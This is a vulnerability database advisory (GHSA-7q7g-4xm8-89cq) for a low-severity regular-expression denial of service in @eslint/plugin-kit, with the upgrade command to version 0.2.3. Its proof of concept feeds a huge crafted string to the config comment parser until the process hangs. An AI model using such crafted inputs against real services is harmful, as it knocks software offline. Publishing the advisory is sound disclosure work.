VDB
Sign up
LOW3.5

GHSA-7q7g-4xm8-89cq

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Quick fix

GHSA-7q7g-4xm8-89cq — @eslint/plugin-kit: upgrade to the fixed version with the command below.

npm install @eslint/plugin-kit@0.2.3

Details

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

## POC

```js const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = ""; for (var i = 0; i < 1000000; i++) { str += " "; } str += "A";

console.log("start") var parser = new ConfigCommentParser(); console.log(parser.parseStringConfig(str, "")); console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` // then the program will stuck forever with high CPU usage ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@eslint/plugin-kit
Introduced in: 0Fixed in: 0.2.3
Fixnpm install @eslint/plugin-kit@0.2.3

References